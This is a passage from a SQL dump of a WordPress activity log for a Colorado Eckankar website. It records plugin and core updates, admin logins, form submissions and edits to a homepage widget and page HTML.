DavidAnderson</a>'),(241546,41047,'plugin_version','1.23.11'),(241547,41047,'plugin_url','https://updraftplus.com'),(241548,41047,'plugin_prev_version','1.23.10'),(241549,41047,'_message_key','plugin_bulk_updated'),(241550,41047,'_user_id','2'),(241551,41047,'_user_login','S8zhaBda'),(241552,41047,'_user_email','nada@zipnadanot.org'),(241553,41047,'_server_remote_addr','76.130.120.x'),(241554,41047,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241555,41048,'plugin_slug','wp-staging'),(241556,41048,'plugin_name','WP STAGING - Backup Duplicator &amp; Migration'),(241557,41048,'plugin_title','<a href=\"https://wordpress.org/plugins/wp-staging\">WP STAGING - Backup Duplicator &amp; Migration</a>'),(241558,41048,'plugin_description','Backup Restore <cite>By <a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>.</cite>'),(241559,41048,'plugin_author','<a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>'),(241560,41048,'plugin_version','3.1.1'),(241561,41048,'plugin_url','https://wordpress.org/plugins/wp-staging'),(241562,41048,'plugin_prev_version','3.1.0'),(241563,41048,'_message_key','plugin_bulk_updated'),(241564,41048,'_user_id','2'),(241565,41048,'_user_login','S8zhaBda'),(241566,41048,'_user_email','nada@zipnadanot.org'),(241567,41048,'_server_remote_addr','76.130.120.x'),(241568,41048,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241569,41049,'plugin_slug','code-snippets'),(241570,41049,'plugin_name','Code Snippets'),(241571,41049,'plugin_title','<a href=\"https://codesnippets.pro\">Code Snippets</a>'),(241572,41049,'plugin_description','An easy, clean and simple way to run code snippets on your site. No need to edit to your theme&#8217;s functions.php file again! <cite>By <a href=\"https://codesnippets.pro\">Code Snippets Pro</a>.</cite>'),(241573,41049,'plugin_author','<a href=\"https://codesnippets.pro\">Code Snippets Pro</a>'),(241574,41049,'plugin_version','3.6.1'),(241575,41049,'plugin_url','https://codesnippets.pro'),(241576,41049,'plugin_prev_version','3.5.0'),(241577,41049,'_message_key','plugin_bulk_updated'),(241578,41049,'_user_id','2'),(241579,41049,'_user_login','S8zhaBda'),(241580,41049,'_user_email','nada@zipnadanot.org'),(241581,41049,'_server_remote_addr','76.130.120.x'),(241582,41049,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241583,41050,'plugin_name','Ninja Forms'),(241584,41050,'plugin_current_version','3.6.34'),(241585,41050,'plugin_new_version','3.6.32'),(241586,41050,'_message_key','plugin_update_available'),(241587,41050,'_server_remote_addr','173.231.231.x'),(241588,41051,'plugin_name','Redis Object Cache'),(241589,41051,'plugin_slug','redis-cache'),(241590,41051,'plugin_title','<a href=\"https://wordpress.org/plugins/redis-cache/\">Redis Object Cache</a>'),(241591,41051,'plugin_description','A persistent object cache backend powered by Redis. Supports Predis, PhpRedis, Relay, replication, sentinels, clustering and WP-CLI. <cite>By <a href=\"https://objectcache.pro\">Till Krüss</a>.</cite>'),(241592,41051,'plugin_author','<a href=\"https://objectcache.pro\">Till Krüss</a>'),(241593,41051,'plugin_version','2.4.4'),(241594,41051,'plugin_url','https://wordpress.org/plugins/redis-cache/'),(241595,41051,'plugin_github_url','https://github.com/rhubarbgroup/redis-cache'),(241596,41051,'_message_key','plugin_deactivated'),(241597,41051,'_user_id','2'),(241598,41051,'_user_login','S8zhaBda'),(241599,41051,'_user_email','nada@zipnadanot.org'),(241600,41051,'_server_remote_addr','76.130.120.x'),(241601,41051,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241602,41052,'plugin_name','Redis Object Cache'),(241603,41052,'plugin_slug','redis-cache'),(241604,41052,'plugin_title','<a href=\"https://wordpress.org/plugins/redis-cache/\">Redis Object Cache</a>'),(241605,41052,'plugin_description','A persistent object cache backend powered by Redis. Supports Predis, PhpRedis, Relay, replication, sentinels, clustering and WP-CLI. <cite>By <a href=\"https://objectcache.pro\">Till Krüss</a>.</cite>'),(241606,41052,'plugin_author','<a href=\"https://objectcache.pro\">Till Krüss</a>'),(241607,41052,'plugin_version','2.4.4'),(241608,41052,'plugin_url','https://wordpress.org/plugins/redis-cache/'),(241609,41052,'plugin_github_url','https://github.com/rhubarbgroup/redis-cache'),(241610,41052,'_message_key','plugin_activated'),(241611,41052,'_user_id','2'),(241612,41052,'_user_login','S8zhaBda'),(241613,41052,'_user_email','nada@zipnadanot.org'),(241614,41052,'_server_remote_addr','76.130.120.x'),(241615,41052,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(241616,41053,'_user_id','2'),(241617,41053,'_user_login','S8zhaBda'),(241618,41053,'_user_email','nada@zipnadanot.org'),(241619,41053,'_message_key','user_logged_out'),(241620,41053,'_server_remote_addr','76.130.120.x'),(241621,41053,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241622,41054,'wp_core_current_version','6.3.2'),(241623,41054,'wp_core_new_version','6.4'),(241624,41054,'_message_key','core_update_available'),(241625,41054,'_server_remote_addr','173.231.231.x'),(241626,41055,'theme_name','Twenty Twenty-Three'),(241627,41055,'theme_current_version','1.2'),(241628,41055,'theme_new_version','1.3'),(241629,41055,'_message_key','theme_update_available'),(241630,41055,'_server_remote_addr','173.231.231.x'),(241631,41056,'plugin_name','WPCode Lite'),(241632,41056,'plugin_current_version','2.1.4.1'),(241633,41056,'plugin_new_version','2.1.5'),(241634,41056,'_message_key','plugin_update_available'),(241635,41056,'_server_remote_addr','173.231.231.x'),(241636,41057,'plugin_name','UpdraftPlus - Backup/Restore'),(241637,41057,'plugin_current_version','1.23.11'),(241638,41057,'plugin_new_version','1.23.12'),(241639,41057,'_message_key','plugin_update_available'),(241640,41057,'_server_remote_addr','173.231.231.x'),(241641,41058,'plugin_name','Passster'),(241642,41058,'plugin_current_version','4.2.5'),(241643,41058,'plugin_new_version','4.2.6'),(241644,41058,'_message_key','plugin_update_available'),(241645,41058,'_server_remote_addr','173.231.231.x'),(241646,41059,'plugin_name','Ninja Forms'),(241647,41059,'plugin_current_version','3.6.34'),(241648,41059,'plugin_new_version','3.7.0'),(241649,41059,'_message_key','plugin_update_available'),(241650,41059,'_server_remote_addr','173.231.231.x'),(241651,41060,'user_id','2'),(241652,41060,'user_email','nada@zipnadanot.org'),(241653,41060,'user_login','S8zhaBda'),(241654,41060,'_user_id','2'),(241655,41060,'_user_login','S8zhaBda'),(241656,41060,'_user_email','nada@zipnadanot.org'),(241657,41060,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(241658,41060,'_message_key','user_logged_in'),(241659,41060,'_server_remote_addr','76.130.120.x'),(241660,41060,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241661,41061,'post_id','269369'),(241662,41061,'post_type','nf_sub'),(241663,41061,'post_title',''),(241664,41061,'_message_key','post_updated'),(241665,41061,'_server_remote_addr','166.199.99.x'),(241666,41061,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_Novemberr_2023_Reminder_Week_2&utm_medium=email'),(241667,41062,'plugin_slug','ninja-forms'),(241668,41062,'plugin_name','Ninja Forms'),(241669,41062,'plugin_title','<a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=readme\">Ninja Forms</a>'),(241670,41062,'plugin_description','Ninja Forms is a webform builder with unparalleled ease of use and features. <cite>By <a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=Plugins+WP+Dashboard\">Saturday Drive</a>.</cite>'),(241671,41062,'plugin_author','<a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=Plugins+WP+Dashboard\">Saturday Drive</a>'),(241672,41062,'plugin_version','3.7.0'),(241673,41062,'plugin_url','http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=readme'),(241674,41062,'plugin_prev_version','3.6.34'),(241675,41062,'_message_key','plugin_bulk_updated'),(241676,41062,'_user_id','2'),(241677,41062,'_user_login','S8zhaBda'),(241678,41062,'_user_email','nada@zipnadanot.org'),(241679,41062,'_server_remote_addr','76.130.120.x'),(241680,41062,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241681,41063,'plugin_slug','content-protector'),(241682,41063,'plugin_name','Passster'),(241683,41063,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(241684,41063,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick Posner</a>.</cite>'),(241685,41063,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(241686,41063,'plugin_version','4.2.6'),(241687,41063,'plugin_url','https://patrickposner.dev'),(241688,41063,'plugin_prev_version','4.2.5'),(241689,41063,'_message_key','plugin_bulk_updated'),(241690,41063,'_user_id','2'),(241691,41063,'_user_login','S8zhaBda'),(241692,41063,'_user_email','nada@zipnadanot.org'),(241693,41063,'_server_remote_addr','76.130.120.x'),(241694,41063,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241695,41064,'plugin_slug','updraftplus'),(241696,41064,'plugin_name','UpdraftPlus - Backup/Restore'),(241697,41064,'plugin_title','<a href=\"https://updraftplus.com\">UpdraftPlus - Backup/Restore</a>'),(241698,41064,'plugin_description','Backup and restore: take backups locally, or backup to Amazon S3, Dropbox, Google Drive, Rackspace, (S)FTP, WebDAV &amp; email, on automatic schedules. <cite>By <a href=\"https://updraftplus.com\">UpdraftPlus.Com, DavidAnderson</a>.</cite>'),(241699,41064,'plugin_author','<a href=\"https://updraftplus.com\">UpdraftPlus.Com, DavidAnderson</a>'),(241700,41064,'plugin_version','1.23.12'),(241701,41064,'plugin_url','https://updraftplus.com'),(241702,41064,'plugin_prev_version','1.23.11'),(241703,41064,'_message_key','plugin_bulk_updated'),(241704,41064,'_user_id','2'),(241705,41064,'_user_login','S8zhaBda'),(241706,41064,'_user_email','nada@zipnadanot.org'),(241707,41064,'_server_remote_addr','76.130.120.x'),(241708,41064,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241709,41065,'plugin_slug','insert-headers-and-footers'),(241710,41065,'plugin_name','WPCode Lite'),(241711,41065,'plugin_title','<a href=\"https://www.wpcode.com/\">WPCode Lite</a>'),(241712,41065,'plugin_description','Easily add code snippets in WordPress. Insert scripts to the header and footer, add PHP code snippets with conditional logic, insert ads pixel, custom content, and more. <cite>By <a href=\"https://www.wpcode.com/\">WPCode</a>.</cite>'),(241713,41065,'plugin_author','<a href=\"https://www.wpcode.com/\">WPCode</a>'),(241714,41065,'plugin_version','2.1.5'),(241715,41065,'plugin_url','https://www.wpcode.com/'),(241716,41065,'plugin_prev_version','2.1.4.1'),(241717,41065,'_message_key','plugin_bulk_updated'),(241718,41065,'_user_id','2'),(241719,41065,'_user_login','S8zhaBda'),(241720,41065,'_user_email','nada@zipnadanot.org'),(241721,41065,'_server_remote_addr','76.130.120.x'),(241722,41065,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241723,41066,'prev_version','6.3.2'),(241724,41066,'new_version','6.4'),(241725,41066,'_message_key','core_updated'),(241726,41066,'_user_id','2'),(241727,41066,'_user_login','S8zhaBda'),(241728,41066,'_user_email','nada@zipnadanot.org'),(241729,41066,'_server_remote_addr','76.130.120.x'),(241730,41066,'_server_http_referer','https://eckankar-colorado.org/wp-admin/update-core.php'),(241731,41067,'theme_name','Twenty Twenty-Three'),(241732,41067,'theme_version','1.3'),(241733,41067,'_message_key','theme_updated'),(241734,41067,'_user_id','2'),(241735,41067,'_user_login','S8zhaBda'),(241736,41067,'_user_email','nada@zipnadanot.org'),(241737,41067,'_server_remote_addr','76.130.120.x'),(241738,41067,'_server_http_referer','https://eckankar-colorado.org/wp-admin/update-core.php?action=do-theme-upgrade'),(241739,41068,'theme_slug','twentytwentythree'),(241740,41068,'theme_name','Twenty Twenty-Three'),(241741,41068,'theme_version','1.3'),(241742,41068,'theme_author','the WordPress team'),(241743,41068,'theme_description','Twenty Twenty-Three is designed to take advantage of the new design tools introduced in WordPress 6.1. With a clean, blank base as a starting point, this default theme includes ten diverse style variations created by members of the WordPress community. Whether you want to build a complex or incredibly simple website, you can do it quickly and intuitively through the bundled styles or dive into creation and full customization yourself.'),(241744,41068,'_message_key','theme_deleted'),(241745,41068,'_user_id','2'),(241746,41068,'_user_login','S8zhaBda'),(241747,41068,'_user_email','nada@zipnadanot.org'),(241748,41068,'_server_remote_addr','76.130.120.x'),(241749,41068,'_server_http_referer','https://eckankar-colorado.org/wp-admin/themes.php?theme=twentytwentythree'),(241750,41069,'_user_id','2'),(241751,41069,'_user_login','S8zhaBda'),(241752,41069,'_user_email','nada@zipnadanot.org'),(241753,41069,'_message_key','user_logged_out'),(241754,41069,'_server_remote_addr','76.130.120.x'),(241755,41069,'_server_http_referer','https://eckankar-colorado.org/wp-admin/index.php'),(241756,41070,'wp_core_current_version','6.4'),(241757,41070,'wp_core_new_version','6.4.1'),(241758,41070,'_message_key','core_update_available'),(241759,41070,'_server_remote_addr','173.231.231.x'),(241760,41071,'prev_version','6.4'),(241761,41071,'new_version','6.4.1'),(241762,41071,'_message_key','core_auto_updated'),(241763,41071,'_wp_cron_running','true'),(241764,41071,'_server_remote_addr','173.231.231.x'),(241765,41072,'plugin_name','Fluent Forms'),(241766,41072,'plugin_current_version','5.1.1'),(241767,41072,'plugin_new_version','5.1.2'),(241768,41072,'_message_key','plugin_update_available'),(241769,41072,'_server_remote_addr','173.231.231.x'),(241770,41073,'post_id','269370'),(241771,41073,'post_type','nf_sub'),(241772,41073,'post_title',''),(241773,41073,'_message_key','post_updated'),(241774,41073,'_server_remote_addr','47.12.99.x'),(241775,41073,'_server_http_referer','https://eckankar-colorado.org/newsletter-subscription-public/'),(241776,41074,'plugin_name','Responsive Accordion And Collapse'),(241777,41074,'plugin_current_version','2.4.5'),(241778,41074,'plugin_new_version','2.4.6'),(241779,41074,'_message_key','plugin_update_available'),(241780,41074,'_server_remote_addr','173.231.231.x'),(241781,41075,'plugin_name','Code Snippets'),(241782,41075,'plugin_current_version','3.6.1'),(241783,41075,'plugin_new_version','3.6.2'),(241784,41075,'_message_key','plugin_update_available'),(241785,41075,'_server_remote_addr','173.231.231.x'),(241786,41076,'post_id','269371'),(241787,41076,'post_type','nf_sub'),(241788,41076,'post_title',''),(241789,41076,'_message_key','post_updated'),(241790,41076,'_server_remote_addr','174.29.87.x'),(241791,41076,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241792,41077,'plugin_name','Modern Events Calendar'),(241793,41077,'plugin_current_version','7.2.2'),(241794,41077,'plugin_new_version','7.3.0'),(241795,41077,'_message_key','plugin_update_available'),(241796,41077,'_server_remote_addr','173.231.231.x'),(241797,41078,'user_id','2'),(241798,41078,'user_email','nada@zipnadanot.org'),(241799,41078,'user_login','S8zhaBda'),(241800,41078,'_user_id','2'),(241801,41078,'_user_login','S8zhaBda'),(241802,41078,'_user_email','nada@zipnadanot.org'),(241803,41078,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(241804,41078,'_message_key','user_logged_in'),(241805,41078,'_server_remote_addr','76.130.120.x'),(241806,41078,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241807,41079,'widget_id_base','custom_html'),(241808,41079,'widget_name_translated','Custom HTML'),(241809,41079,'sidebar_id','null'),(241810,41079,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(241811,41079,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(241812,41079,'_message_key','widget_edited'),(241813,41079,'_user_id','2'),(241814,41079,'_user_login','S8zhaBda'),(241815,41079,'_user_email','nada@zipnadanot.org'),(241816,41079,'_server_remote_addr','76.130.120.x'),(241817,41079,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(241818,41080,'widget_id_base','custom_html'),(241819,41080,'widget_name_translated','Custom HTML'),(241820,41080,'sidebar_id','null'),(241821,41080,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(241822,41080,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 350px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(241823,41080,'_message_key','widget_edited'),(241824,41080,'_user_id','2'),(241825,41080,'_user_login','S8zhaBda'),(241826,41080,'_user_email','nada@zipnadanot.org'),(241827,41080,'_server_remote_addr','76.130.120.x'),(241828,41080,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(241829,41081,'setting_id','widget_custom_html[6]'),(241830,41081,'setting_old_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(241831,41081,'setting_new_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 350px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(241832,41081,'control_id','widget_custom_html[6]'),(241833,41081,'control_label','Custom HTML'),(241834,41081,'control_type','widget_form'),(241835,41081,'_message_key','appearance_customized'),(241836,41081,'_user_id','2'),(241837,41081,'_user_login','S8zhaBda'),(241838,41081,'_user_email','nada@zipnadanot.org'),(241839,41081,'_server_remote_addr','76.130.120.x'),(241840,41081,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(241841,41082,'widget_id_base','custom_html'),(241842,41082,'widget_name_translated','Custom HTML'),(241843,41082,'sidebar_id','null'),(241844,41082,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 350px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(241845,41082,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 350px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(241846,41082,'_message_key','widget_edited'),(241847,41082,'_user_id','2'),(241848,41082,'_user_login','S8zhaBda'),(241849,41082,'_user_email','nada@zipnadanot.org'),(241850,41082,'_server_remote_addr','76.130.120.x'),(241851,41082,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(241852,41083,'post_id','7160'),(241853,41083,'post_type','page'),(241854,41083,'post_title','Home'),(241855,41083,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" 